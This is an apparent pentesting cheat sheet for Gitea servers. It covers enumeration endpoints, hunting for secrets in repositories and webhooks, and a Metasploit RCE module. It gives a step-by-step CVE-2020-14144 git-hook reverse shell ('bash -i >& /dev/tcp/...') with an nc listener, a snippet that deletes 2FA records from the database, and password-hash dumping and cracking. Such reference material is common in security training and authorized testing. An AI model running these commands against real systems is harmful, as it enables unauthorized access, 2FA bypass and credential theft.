# Gitea Pentesting

Gitea is a forge software package for hosting software development version control using Git.

### Common Directories <a href="#common-directories" id="common-directories"></a>

```shellscript
/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users

# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys
```

### Investigation <a href="#investigation" id="investigation"></a>

#### Source Code in Repositories <a href="#source-code-in-repositories" id="source-code-in-repositories"></a>

If we can access to repositories, we might be able to find sensitive information e.g. credentials, subdomains, other domains, secret keys, etc.\
So check the source code.

#### Go Back to Previous Commits <a href="#go-back-to-previous-commits" id="go-back-to-previous-commits"></a>

We can see the source code of previous commits and find sensitive information accidentally disclosed by committers.

#### Get Secrets in Web Hooks <a href="#get-secrets-in-web-hooks" id="get-secrets-in-web-hooks"></a>

In the existing repository, we may find the secret value in the **repository → Settings → Web Hooks**.

#### Find User Credentials <a href="#find-user-credentials" id="find-user-credentials"></a>

If we have access to the target system and the repository, that is pushed in Gitea, exists in the system, we might be able to find the credential.

```
cd /path/to/gitea/repo
git config -l
```

### Git Fetch Remote Code Execution (RCE) <a href="#git-fetch-remote-code-execution-rce" id="git-fetch-remote-code-execution-rce"></a>

#### Metasploit <a href="#metasploit" id="metasploit"></a>

```
msfconsole
msf> use exploit/multi/http/gitea_git_fetch_rce
msf> (set options)
msf> run
```

### Git Hooks Remote Code Execution (RCE) <a href="#git-hooks-remote-code-execution-rce" id="git-hooks-remote-code-execution-rce"></a>

[CVE-2020-14144](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce)\
It affects Gitea version from 1.1.0 to 1.13.

#### 1. Login <a href="#id-1-login" id="id-1-login"></a>

Access to the Gitea dashboard and login as the existing account.

#### 2. Create a New Repository <a href="#id-2-create-a-new-repository" id="id-2-create-a-new-repository"></a>

#### 3. Go to the Repository’s Settings <a href="#id-3-go-to-the-repositorys-settings" id="id-3-go-to-the-repositorys-settings"></a>

In the new repository we’ve created, go to **Settings → Git Hooks → post-receive**.

#### 4. Update to the Reverse Shell Payload <a href="#id-4-update-to-the-reverse-shell-payload" id="id-4-update-to-the-reverse-shell-payload"></a>

In the post-receive edit page, inject the payload as below:

```
#!/bin/bash

bash -i >& /dev/tcp/10.0.0.1/4444
```

#### 5. Start Listener in Terminal <a href="#id-5-start-listener-in-terminal" id="id-5-start-listener-in-terminal"></a>

To receive the outcoming connection of the git hook, start listener.

```
nc -lvnp 4444
```

#### 6. Create the New Repository in Terminal <a href="#id-6-create-the-new-repository-in-terminal" id="id-6-create-the-new-repository-in-terminal"></a>

```
mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master
```

After pushing, git hook triggered and execute the reverse shell command.\
Now we should get a shell.

### Swagger API <a href="#swagger-api" id="swagger-api"></a>

We can access to **`/api/swagger`** to interact with **Swagger API**.

#### Get New Token & Authorize <a href="#get-new-token-authorize" id="get-new-token-authorize"></a>

We need a token to use Swagger API.

1. Register a new account in Gitea top page.
2. Go to **`/user/settings/applications`** and generate a new token.
3. Copy the token value e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
4. Go to **`/api/swagger`**.
5. Click “Authorize” button. The modal window opens.
6. Paste the token in the “Token” section.

### Delete the Two-Factor <a href="#delete-the-two-factor" id="delete-the-two-factor"></a>

```
victim@machine:/gitea/gitea$ python3

>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()
```

### Dump Credentials in Database <a href="#dump-credentials-in-database" id="dump-credentials-in-database"></a>

Reference: [Cracking Gitea's PBKDF2 Password Hashes](https://www.unix-ninja.com/p/cracking_giteas_pbkdf2_password_hashes)

Gitea has the database file so we can find user hashes from this file.

```
# 1. Open it with `sqlite3`
sqlite3 /path/to/gitea/data/gitea.db
# 2. Retrieve credentials from the `user` table
sqlite> select email,salt,passwd,passwd_hash_algo from user;
```

Once the hashes found, we can crack them using [gitea2hashcat](https://github.com/unix-ninja/hashcat/blob/master/tools/gitea2hashcat.py).

```
# Paste the hashes (salt|passwd only) of the result above
python3 gitea2hashcat.py '<salt>|<passwd>'
```

Copy the output and crack it with Hashcat:

```
# the `-m 1900` may change depending on the hash algorithm.
hashcat -m 10900 '<hash>' wordlist.txt
```